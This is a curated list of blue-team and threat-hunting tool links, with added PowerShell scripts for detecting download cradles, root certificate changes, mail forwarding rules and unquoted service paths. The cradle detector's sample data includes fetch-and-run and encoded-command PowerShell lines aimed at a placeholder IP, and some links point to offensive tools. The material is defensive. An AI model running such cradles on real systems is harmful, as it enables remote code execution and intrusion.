Hunting-Scripts

A collection of hunting and blue-team scripts and tools; mostly written by others.

PowerShell--

fake sandbox https://github.com/Phoenix1747/fake-sandbox

DevSec-Defense (Daniel Bohannon) to detect PowerShell backtick usage & obfuscation https://github.com/danielbohannon/DevSec-Defense https://www.x33fcon.com/archive/2018/slides/x33fcon18_DevSecDefense_DanielBohannon.pdf https://www.youtube.com/watch?v=QJe8xikf-iE

Process Spawn Control suspends newly launched processes https://github.com/felixweyne/ProcessSpawnControl

Find injected processes https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2

Find Forms https://gist.github.com/staaldraad/0604788fbe974cd53ed59cc1e3185cce

Detect mailbox rule attacks in Windows event logs https://gist.github.com/staaldraad/a7de22afa69ec10f1ec7d995d2bd913c

Timeline from memory https://www.pigstye.net/forensics/volatility.html

Invoke-Adversary to test defenses https://github.com/MotiBa/Invoke-Adversary/tree/master

Baseline known-good Microsoft PEs https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e

Remove macros https://chentiangemalc.wordpress.com/2012/01/17/powershell-script-to-remove-office-macro-protection/

Packet capture to pcap from PowerShell without drivers https://www.nospaceships.com/2018/09/19/packet-capture-on-windows-without-drivers.html

Find Kerberos Golden Tickets https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285 & https://github.com/spohara79/TGT---Golden-Silver-Ticket

Skeleton Key scanner https://gallery.technet.microsoft.com/Aorato-Skeleton-Key-24e46b73

Detect ruler attacks in Exchange and DC logs https://sensepost.com/blog/2017/notruler-turning-offence-into-defence/

Detect DCShadow attacks https://github.com/AlsidOfficial/UncoverDCShadow

A PowerShell script to interact with the MITRE ATT&CK Framework via its own API https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI

Mitigate internal recon by restricting Net Session Enumeration (Net Cease) https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b

Hunting webshells on Microsoft Exchange Servers https://github.com/FixTheExchange/Invoke-ExchangeWebShellHunter

Power Forensics https://github.com/Invoke-IR/PowerForensics

Mem pull https://github.com/n3l5/irMempull

PowerShell IR (Invoke-LiveResponse) https://github.com/mgreen27/Powershell-IR https://www.linkedin.com/pulse/invoke-liveresponse-matthew-green

DeepBlue CLI https://github.com/sans-blue-team/DeepBlueCLI

Jason Fossen's SANS SEC505 scripts https://github.com/EnclaveConsulting/SANS-SEC505

PS script to detect memory-only CLR (.NET) modules https://gist.github.com/dezhub/2875fa6dc78083cedeab10abc551cb58

FLARE VM http://boxstarter.org/package/url?https://raw.githubusercontent.com/fireeye/flare-vm/master/flarevm_malware.ps1 https://github.com/fireeye/flare-vm

RVMI Rekall https://github.com/fireeye/rvmi-rekall

List Kerberos Tickets https://gallery.technet.microsoft.com/scriptcenter/List-All-Cached-Kerberos-5ba41829

List local admins https://gallery.technet.microsoft.com/scriptcenter/ed4a0cb7-603c-488d-afeb-194b7a60f42f

Get AD Trust Topology https://gallery.technet.microsoft.com/scriptcenter/Get-AD-Trust-Topology-f8f2d1d7 & https://github.com/WiredPulse/PowerShell/blob/master/Active_Directory/Get-DomainTrusts.ps1

ADFS Security Audit Events Parser https://gallery.technet.microsoft.com/scriptcenter/ADFS-Security-Audit-Events-81c207cf

Hunt self-signed certificates http://cyberfibers.com/2017/11/hunting-self-signed-certificates/

Encrypt/Decrypt files using AES encryption https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d

Get the status of A/V local or remote https://gallery.technet.microsoft.com/scriptcenter/Get-the-status-of-4b748f25

List SPNs https://gallery.technet.microsoft.com/List-all-SPNs-Used-in-your-e0c6267a

Invoke-WebRequest detection https://gist.github.com/Centurion89/33b9517b75d238b59fd85fd060514279

Another PS list https://www.peerlyst.com/posts/resource-infosec-powershell-tools-resources-and-authors

Managing PowerShell in a modern corporate environment https://www.nccgroup.trust/uk/our-research/managing-powershell-in-a-modern-corporate-environment/

Detect PS obfuscation https://github.com/jaapbrasser/Events/blob/master/2017-09-01_BSidesAms2017/Demo/Demo2.ps1 video https://www.youtube.com/watch?v=WOC8vC2KoNs&list=PLwZycuzv10iLBFwRIWNAR-s4iuuUMRuEB&index=12
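
The two entries above (Invoke-WebRequest detection and PS obfuscation detection) both boil down to pattern-matching over Script Block Logging events. The following is an added example of that hunt, not code from this repository or from the linked projects; the pattern names, the backtick-density threshold and the sample events are my own choices, and the sample events are constructed so the detector can be exercised offline.

```powershell
# Added example: hunt PowerShell Script Block Logging events (ID 4104) for
# download cradles, encoded commands and obfuscation markers.
# Pattern set, threshold and sample events are assumptions, not from the page.

$Patterns = [ordered]@{
    DownloadCradle = '(?i)(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b|\bwget\b)'
    EncodedCommand = '(?i)\s-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
    # [char]NN casts, tick-split identifiers (I`E`X), "a"+"b" concatenation, "{1}{0}" -f reordering
    Obfuscation    = '(?i)(\[char\]\d+|`\w`\w|"\+"|\x27\+\x27|"\{\d+\}\{\d+\}[^"]*"\s*-f\b)'
}

function Get-ScriptBlockEvent {
    param([int]$MaxEvents = 5000)
    # Property index 2 of a 4104 event holds the ScriptBlockText field
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            [pscustomobject]@{ Time = $_.TimeCreated; Computer = $_.MachineName; ScriptBlockText = $_.Properties[2].Value }
        }
}

function Get-ScriptBlockFinding {
    [CmdletBinding()]
    param(
        # Objects with Time, Computer and ScriptBlockText, as produced by Get-ScriptBlockEvent
        [Parameter(ValueFromPipeline = $true)] $Event
    )
    process {
        $text = [string]$Event.ScriptBlockText
        if (-not $text) { return }
        $hits = @(foreach ($name in $Patterns.Keys) { if ($text -match $Patterns[$name]) { $name } })
        # Backtick density: ordinary scripts have almost none, tick-obfuscated cradles are full of them
        $ticks = [regex]::Matches($text, '`').Count
        if (($ticks / $text.Length) -gt 0.03) { $hits += 'BacktickDensity' }
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time     = $Event.Time
                Computer = $Event.Computer
                Findings = $hits -join ','
                Snippet  = $text.Substring(0, [Math]::Min(80, $text.Length))
            }
        }
    }
}

# Constructed sample events (not real log data) so the detector runs without an event log
$SampleEvents = @(
    [pscustomobject]@{ Time = '2018-11-02 09:15:03'; Computer = 'WS01'; ScriptBlockText = 'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB' }
    [pscustomobject]@{ Time = '2018-11-02 09:16:40'; Computer = 'WS01'; ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/a.ps1")' }
    [pscustomobject]@{ Time = '2018-11-02 09:17:12'; Computer = 'WS02'; ScriptBlockText = 'I`E`X (N`ew-Ob`ject Net.WebClient).Dow`nloadString(("{1}{0}" -f "5/a.ps1","http://203.0.113."))' }
    [pscustomobject]@{ Time = '2018-11-02 09:18:05'; Computer = 'WS02'; ScriptBlockText = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
)

$SampleEvents | Get-ScriptBlockFinding | Format-Table -AutoSize
# Against live logs: Get-ScriptBlockEvent | Get-ScriptBlockFinding
```

The first sample produces no finding; the second is flagged as a download cradle; the third trips the cradle, obfuscation and backtick-density checks even though "DownloadString" itself is tick-split; the fourth is flagged as an encoded command. Script Block Logging must be enabled by policy for full coverage (PowerShell 5 still auto-logs blocks it considers suspicious), and long scripts arrive split across several 4104 events, so a cradle may be visible only when the fragments are joined on ScriptBlockId.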

PoSh-R2 IR toolkit https://github.com/WiredPulse/PoSh-R2

PowerShell hash comparison (finding the backdoored CCleaner build), network connections http://cyberfibers.com/category/powershell/

EternalBlue vul scan https://gallery.technet.microsoft.com/scriptcenter/EternalBlue-Vulnerability-bf3ad11d

Generate AppLocker rule based on hash https://gallery.technet.microsoft.com/scriptcenter/Generate-AppLocker-baaa9278

Check Autoruns at bootup https://gallery.technet.microsoft.com/scriptcenter/Malware-detection-and-995f01eb

Root certificate diff https://isc.sans.edu/forums/diary/Keep+An+Eye+on+your+Root+Certificates/23030/
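
The root-certificate diff above is straightforward to implement directly. The following is an added example of that check, not code from this repository or from the linked diary; the store list, CSV baseline layout and fingerprint scheme are my own choices.

```powershell
# Added example: snapshot the root certificate stores, diff them against a saved
# baseline, and produce a per-host fingerprint for fleet-wide comparison.
# Baseline format and fingerprint scheme are assumptions, not from the page.

# CurrentUser\Root is included because a per-user root can be planted without admin rights
$Stores = 'Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root'

function Get-RootStoreSnapshot {
    foreach ($store in $Stores) {
        Get-ChildItem -Path $store | ForEach-Object {
            [pscustomobject]@{
                Store      = $store
                Thumbprint = $_.Thumbprint
                Subject    = $_.Subject
                NotAfter   = $_.NotAfter
            }
        }
    }
}

function Export-RootStoreBaseline {
    param([Parameter(Mandatory)][string]$Path)
    Get-RootStoreSnapshot | Sort-Object Store, Thumbprint | Export-Csv -Path $Path -NoTypeInformation
}

function Compare-RootStore {
    param([Parameter(Mandatory)][string]$BaselinePath)
    $baseline = Import-Csv -Path $BaselinePath
    $current  = Get-RootStoreSnapshot
    # Key on store + thumbprint; anything only on the '=>' side appeared since the baseline
    Compare-Object -ReferenceObject $baseline -DifferenceObject $current -Property Store, Thumbprint -PassThru |
        Select-Object @{ n = 'Change'; e = { if ($_.SideIndicator -eq '=>') { 'Added' } else { 'Removed' } } },
                      Store, Thumbprint, Subject, NotAfter
}

function Get-RootStoreFingerprint {
    # SHA-256 over the sorted store|thumbprint list: identical builds should hash identically
    $lines = Get-RootStoreSnapshot | Sort-Object Store, Thumbprint | ForEach-Object { "$($_.Store)|$($_.Thumbprint)" }
    $bytes = [System.Text.Encoding]::UTF8.GetBytes(($lines -join "`n"))
    $hash  = [System.Security.Cryptography.SHA256]::Create().ComputeHash($bytes)
    ($hash | ForEach-Object { $_.ToString('x2') }) -join ''
}

# Usage: take the baseline on a freshly built machine, then diff later
# Export-RootStoreBaseline -Path C:\Baseline\roots.csv
# Compare-RootStore -BaselinePath C:\Baseline\roots.csv | Format-Table -AutoSize
# Get-RootStoreFingerprint
```

Expect some churn: Windows adds roots on demand through the automatic root update mechanism, so an "Added" entry is not by itself malicious. Check each added Subject against the Microsoft Trusted Root Program list, and treat additions in CurrentUser\Root, or roots that sign nothing but an internal hostname, as the interesting ones.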

Various PS https://github.com/WiredPulse/PowerShell

Hunt PS scripts https://github.com/DLACERT/ThreatHunting

Detect pass-the-hash (Ketshash) https://github.com/cyberark/ketshash

Detect shadow admins https://github.com/cyberark/ACLight

Find Exchange Mailboxes with Forwarding Addresses Enabled http://www.syspanda.com/index.php/2018/01/10/exchange-find-mailboxes-forwarding-addresses-enabled/
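
Mailbox forwarding is one of the most common persistence steps after a mailbox compromise, and inbox rules that forward, redirect or silently delete are the other half of the same hunt. The following is an added example covering both, not code from this repository or from the linked post; it assumes an Exchange management shell (on-premises EMS or Exchange Online) session and the internal-domain list is a placeholder to replace.

```powershell
# Added example: find mailbox-level forwarding and suspicious inbox rules.
# Requires Exchange cmdlets (Get-Mailbox, Get-InboxRule) in the session.
# $InternalDomains is an assumption; set it to your accepted domains.

$InternalDomains = @('corp.example.com')

function Test-ExternalAddress {
    param([string]$Text)
    # Pull the SMTP address out of 'smtp:a@b.example' or '"Bob" [SMTP:bob@evil.example]'
    if ($Text -match '([\w.+-]+@[\w.-]+)') {
        $domain = $Matches[1].Split('@')[-1].ToLower()
        return ($InternalDomains -notcontains $domain)
    }
    return $false   # EX:/legacy-DN targets are internal recipients; not flagged here
}

function Get-MailboxForwarding {
    Get-Mailbox -ResultSize Unlimited |
        Where-Object { $_.ForwardingSmtpAddress -or $_.ForwardingAddress } |
        ForEach-Object {
            [pscustomobject]@{
                Mailbox    = $_.PrimarySmtpAddress
                # ForwardingSmtpAddress is an arbitrary SMTP target; ForwardingAddress is a directory recipient
                Forwarding = if ($_.ForwardingSmtpAddress) { $_.ForwardingSmtpAddress } else { $_.ForwardingAddress }
                KeepCopy   = $_.DeliverToMailboxAndForward
                External   = Test-ExternalAddress ([string]$_.ForwardingSmtpAddress)
            }
        }
}

function Get-SuspiciousInboxRule {
    Get-Mailbox -ResultSize Unlimited | ForEach-Object {
        $mbx = $_.PrimarySmtpAddress
        Get-InboxRule -Mailbox $_.Identity |
            Where-Object { $_.Enabled -and ($_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo -or $_.DeleteMessage) } |
            ForEach-Object {
                $targets = @($_.ForwardTo) + @($_.ForwardAsAttachmentTo) + @($_.RedirectTo) | Where-Object { $_ }
                [pscustomobject]@{
                    Mailbox  = $mbx
                    Rule     = $_.Name
                    Targets  = ($targets -join ';')
                    Deletes  = $_.DeleteMessage
                    External = @($targets | Where-Object { Test-ExternalAddress ([string]$_) }).Count -gt 0
                }
            }
    }
}

Get-MailboxForwarding      | Format-Table -AutoSize
Get-SuspiciousInboxRule    | Format-Table -AutoSize
```

Enumerating Get-InboxRule for every mailbox is slow on a large tenant, so scope it to recently active or high-value mailboxes first. A rule with a bland name ("..." or a single space), a DeleteMessage action, and an external target is the classic business-email-compromise pattern; also review the New-InboxRule and Set-Mailbox entries in the admin audit log, since the rule may already have been removed.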

Get USB history https://gallery.technet.microsoft.com/scriptcenter/Get-USBHistory-707e43a3

ms17-010-Scanner https://github.com/vletoux/ms17-010-Scanner

Find local privilege escalation paths (Sherlock) https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1

Threat Hunting Reconnaissance Toolkit THRecon https://github.com/TonyPhipps/THRecon

PowerShell Defense https://github.com/Ben0xA/PowerShellDefense

Extracts Windows Defender Exploit Guard events from the 'Microsoft-Windows-Windows Defender/Operational' event log https://demo.wd.microsoft.com/Content/getEGEvents.zip

Audit script https://github.com/A-mIn3/WINspect

User Simulator https://github.com/ubeeri/Invoke-UserSimulator

Audit AD https://github.com/phillips321/adaudit

Evil Maid detection https://pastebin.com/hAEHibHf

SQL Server attack and audit toolkit (PowerUpSQL) https://github.com/NetSPI/PowerUpSQL

Check the carved memory file for presence of Meterpreter C2 https://github.com/countercept/memory-carving-scripts/blob/master/Get-MeterpreterC2.ps1

Dump memory http://www.exploit-monday.com/2012/03/powershell-live-memory-analysis-tools.html#Dump-Memory

Find vulnerable GPOs https://github.com/gpoguy/GetVulnerableGPO

OAuth Hunting (Azure) https://github.com/dmb2168/OAuthHunting

Test phishing defenses with malicious macro documents (LuckyStrike) https://github.com/curi0usJack/luckystrike

Discover unquoted service paths that can be abused to escalate privileges https://gist.github.com/Evilcry/ba70b8fa746ef7ae352d14bcaaf6bfbb
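
The unquoted-service-path check above is worth seeing end to end, including the part most one-liners skip: which of the paths Windows would try first actually sit in a directory broad groups can write to. The following is an added example, not code from this repository or from the linked gist; the list of "broad" principals is my own choice.

```powershell
# Added example: find services whose executable path is unquoted and contains
# spaces, enumerate the shorter paths CreateProcess would try first, and check
# whether broad groups can write to those directories. Principal list is an assumption.

function Get-HijackCandidate {
    param([Parameter(Mandatory)][string]$ExePath)
    # For 'C:\Program Files\Foo Bar\svc.exe' Windows tries C:\Program.exe,
    # then 'C:\Program Files\Foo.exe', before the real binary
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-BroadWriteAccess {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    $write = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
             [int][System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $broad -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band $write) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path.StartsWith('"')) { return }
        # Only the executable portion matters; spaces in the arguments are harmless
        if ($path -notmatch '^(?<exe>.*?\.exe)') { return }
        $exe = $Matches['exe']
        if ($exe -notmatch ' ') { return }
        foreach ($candidate in Get-HijackCandidate -ExePath $exe) {
            [pscustomobject]@{
                Service     = $_.Name
                RunsAs      = $_.StartName
                StartMode   = $_.StartMode
                PathName    = $path
                Candidate   = $candidate
                DirWritable = Test-BroadWriteAccess -Directory (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

Get-UnquotedServicePath | Format-Table -AutoSize
```

Rows with DirWritable set to True and a service that runs as LocalSystem are the exploitable ones; an unquoted path whose every candidate directory is admin-only is a hygiene finding, not a privilege escalation. The ACL check only looks at a few well-known broad groups, so extend the list with any custom groups that hold ordinary users in your environment.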

Yara--

Outlook Ruler detection https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Signaturing an Authenticode anomaly with Yara https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/signaturing-an-authenticode-anomaly-with-yara/

Loki https://github.com/Neo23x0/Loki

Entropy of PE files https://cyberdefenses.com/yara-entropy-bit-math/

Rule for CCleaner https://blog.nviso.be/2017/09/21/yara-rules-for-ccleaner-5-33/

Detect Mimikatz golden ticket / DCSync https://blog.didierstevens.com/2016/08/12/mimikatz-golden-ticket-dcsync/

HEX to assembly https://haiderm.com/convert-hex-assembly-using-simple-python-script/

Bin/API analysis including FN2Yara https://github.com/cmu-sei/pharos

Find fake certs https://blog.nviso.be/2018/07/31/powershell-inside-a-certificate-part-1/

Python--

Find malicious .NET malware by compilation artifacts https://gist.github.com/countercept/7765ba05ad00255bcf6a4a26d7647f6e

find doublepulsar https://github.com/countercept/doublepulsar-detection-script

Script to check for security bugs in smart contracts https://github.com/ConsenSys/mythril/blob/master/security_checks.md

Ransomware simulator https://gitlab.com/networkintelligence/inr/ransom_sim/tree/master

Script for malware analysis https://github.com/beenuar/Py-DarkC0de/blob/master/analyse_malware.py

Make your own Volatility plug-in https://github.com/iAbadia/Volatility-Plugin-Tutorial

Kill Chain Fuzzer https://github.com/SafeBreach-Labs/blog-snippets/blob/master/killchainfuzzer.py

FastIR https://github.com/SekoiaLab/Fastir_Collector

Mystique - enterprise malicious mutex detection https://github.com/MinervaLabsResearch/Mystique

SSDeep Elastic https://github.com/intezer/ssdeep-elastic

Memory Patch detector https://github.com/intezer/MemoryPatchDetector

Script to compare your similar Linux cloud application servers with each other to discover possible indications of compromise. https://github.com/morphuslabs/distinct

Phishing catcher using Certstream (https://certstream.calidog.io/) https://github.com/x0rz/phishing_catcher

Leak File Analyzer https://github.com/Neo23x0/radiocarbon

Find miners https://github.com/wrinkl3/MineSweepR

Inspect PDFs https://github.com/jesparza/peepdf

User simulation https://github.com/cmu-sei/usersim

Find PeddleCheap in pcaps https://github.com/johnbergbom/PeddleCheap/blob/master/dp_decrypt.py (with samples)

Find danderspritz https://github.com/fox-it/danderspritz-evtx

Python exe unpacker https://github.com/countercept/python-exe-unpacker

RDP Bitmap Cache parser https://github.com/ANSSI-FR/bmc-tools

macOS IR tool https://github.com/daguy666/Transit

Tool for automatic list generation of known TOR and VPN exit nodes https://github.com/uforia/exitgather

Parsing tool to discover potential SQL injection points https://github.com/RhinoSecurityLabs/SleuthQL

Go--

Find webshells (regular expressions supported) https://github.com/tstillz/webshell-scan

Misc--

Open source tools Netflix Security Team https://medium.com/netflix-techblog/a-brief-history-of-open-source-from-the-netflix-cloud-security-team-412b5d4f1e0c

APT Simulator https://github.com/Neo23x0/APTSimulator

Infection Monkey - APT simulator https://github.com/guardicore/monkey

CALDERA automated adversary emulation system https://github.com/mitre/caldera

APT3 Emulator https://attack.mitre.org/wiki/Adversary_Emulation_Plans

PS to exe https://github.com/interference-security/PS2EXE

YARA signature to check for DEP and ASLR https://summitroute.com/blog/2017/07/24/yara_sigs_for_security_best_practices/

CyLR CDQR Forensics Virtual Machine (CCF-VM) https://github.com/rough007/CCF-VM (a-z - endpoint IR collection to dbase backend)

Threat Hunting Playbook https://github.com/Kathayra/ThreatHunter-Playbook TH tracking https://github.com/Kathayra/HT-Trackr

Android vulnerability tester https://github.com/AndroidVTS/android-vts

Sysmon config https://github.com/SwiftOnSecurity/sysmon-config

GRR write up https://chip-dfir.techanarchy.net/?p=395

Detect dll hijacking https://github.com/adamkramer/dll_hijack_detect

Detection tests mapped to the MITRE ATT&CK matrix (Atomic Red Team) https://github.com/redcanaryco/atomic-red-team

.NET runtime inspector https://github.com/enkomio/shed

Harden Windows (hardentools) https://github.com/securitywithoutborders/hardentools/releases/tag/v1.0

Deception -- It is all about the buzz

Emulate VM environments https://github.com/adamkramer/rapid_env

Test a sandbox - PoC malware with good intentions https://github.com/LordNoteworthy/al-khaser

Pafish - Testing tool to emulate an infection https://github.com/a0rtega/pafish

Canarytokens https://canarytokens.org/generate

todo: FTK scripting https://accessdata.com/product-download/windows-32bit-3.1.1/

Hook Finder https://github.com/hasherezade/hook_finder

Lateral Movement script https://securelist.com/happy-ir-in-the-new-year/83557/

Find DLL injection http://cyberfibers.com/2017/11/525/

event subscription https://github.com/palantir/windows-event-forwarding

Binary commandline executable to parse ETL files https://github.com/gcpartners/ETLParser

other lists --

https://github.com/rshipp/awesome-malware-analysis

https://github.com/0x4D31/awesome-threat-detection
